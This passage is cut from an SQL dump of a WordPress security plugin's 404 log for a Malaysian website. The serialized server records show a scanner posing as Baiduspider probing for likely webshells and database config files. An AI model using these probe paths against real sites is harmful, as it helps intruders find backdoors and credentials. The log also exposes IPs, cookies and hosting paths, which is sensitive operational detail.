14:23:18',35046248,36852720,'https://bintara.com.my/data/cache/t.php',1,0,'188.170.171.214'),(27695,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/dxyylc/md5.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"231.84.153.128\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2d789cfa483bee6796ace1aab3b6da95\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"231.84.153.128\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybyLDTiPzaBc@31OEzKwAAARU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybyLDTiPzaBc@31OEzKwAAARU\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybyLDTiPzaBc@31OEzKwAAARU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"60778\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/dxyylc/md5.php\";s:10:\"SCRIPT_URL\";s:15:\"/dxyylc/md5.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybyLDTiPzaBc@31OEzKwAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544584.4863\";s:12:\"REQUEST_TIME\";s:10:\"1570544584\";}}','notice','2019-10-08 14:23:06','2019-10-08 14:23:04',35042008,36852856,'https://bintara.com.my/dxyylc/md5.php',1,0,'231.84.153.128'),(27694,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//dxyylc/md5.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"432\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"154.135.116.75\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"154.135.116.75\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/dxyylc/md5.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/dxyylc/md5.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybvbDTiPzaBc@31OEzIgAAAQA\";s:12:\"REDIRECT_URL\";s:16:\"/dxyylc/md5.aspx\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"58697\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/dxyylc/md5.aspx\";s:10:\"SCRIPT_URL\";s:16:\"/dxyylc/md5.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XZybvbDTiPzaBc@31OEzIgAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544573.6662\";s:12:\"REQUEST_TIME\";s:10:\"1570544573\";}}','notice','2019-10-08 14:22:56','2019-10-08 14:22:54',35828728,37633152,'http://bintara.com.my//dxyylc/md5.aspx',1,0,'154.135.116.75'),(27693,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/data/data/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"200.147.12.12\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=df7ae5834ae058ef2ac8714f3d873c2a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"200.147.12.12\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/data/data/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/data/data/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybs7DTiPzaBc@31OEzGQAAARA\";s:12:\"REDIRECT_URL\";s:11:\"/data/data/\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"55917\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/data/data/\";s:10:\"SCRIPT_URL\";s:11:\"/data/data/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybs7DTiPzaBc@31OEzGQAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544563.5996\";s:12:\"REQUEST_TIME\";s:10:\"1570544563\";}}','notice','2019-10-08 14:22:45','2019-10-08 14:22:43',35044624,36847592,'https://bintara.com.my/data/data/',1,0,'200.147.12.12'),(27692,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/data/conn/config.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"178.68.124.67\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=8326f18989e807edafac72053989afa4\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"178.68.124.67\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybq3URUVLSjYCXpcIypQAAANI\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybq3URUVLSjYCXpcIypQAAANI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybq3URUVLSjYCXpcIypQAAANI\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybq3URUVLSjYCXpcIypQAAANI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"54578\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/data/conn/config.php\";s:10:\"SCRIPT_URL\";s:21:\"/data/conn/config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybq3URUVLSjYCXpcIypQAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544555.1041\";s:12:\"REQUEST_TIME\";s:10:\"1570544555\";}}','notice','2019-10-08 14:22:36','2019-10-08 14:22:35',35061152,36864384,'https://bintara.com.my/data/conn/config.php',1,0,'178.68.124.67'),(27691,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/data/config.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"30.126.148.126\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=c346ad6398285f962ca70718bb4ab6fd\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"30.126.148.126\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/data/config.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyborDTiPzaBc@31OEzFAAAAQk\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/data/config.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyborDTiPzaBc@31OEzFAAAAQk\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/data/config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyborDTiPzaBc@31OEzFAAAAQk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"52815\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/data/config.php\";s:10:\"SCRIPT_URL\";s:16:\"/data/config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyborDTiPzaBc@31OEzFAAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544546.2549\";s:12:\"REQUEST_TIME\";s:10:\"1570544546\";}}','notice','2019-10-08 14:22:28','2019-10-08 14:22:26',35044912,36851632,'https://bintara.com.my/data/config.php',1,0,'30.126.148.126'),(27690,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/book/story_dod_hjkdsafon.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"141.44.159.221\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d5d1154f0403df30036cdfe31919f5ed\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"141.44.159.221\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybjrDTiPzaBc@31OEzCwAAAQc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybjrDTiPzaBc@31OEzCwAAAQc\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybjrDTiPzaBc@31OEzCwAAAQc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"49963\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/book/story_dod_hjkdsafon.php\";s:10:\"SCRIPT_URL\";s:29:\"/book/story_dod_hjkdsafon.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybjrDTiPzaBc@31OEzCwAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544526.1809\";s:12:\"REQUEST_TIME\";s:10:\"1570544526\";}}','notice','2019-10-08 14:22:07','2019-10-08 14:22:06',35054008,36861456,'https://bintara.com.my/book/story_dod_hjkdsafon.php',1,0,'141.44.159.221'),(27689,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:76:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"130.6.184.242\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=11d8edfac2ed0d6a048fe9e0d87f0888\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"130.6.184.242\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/bbs/utility/convert/data/config.inc.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/bbs/utility/convert/data/config.inc.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZybhsC1sJTsX3mg7G4I7wAAAAo\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.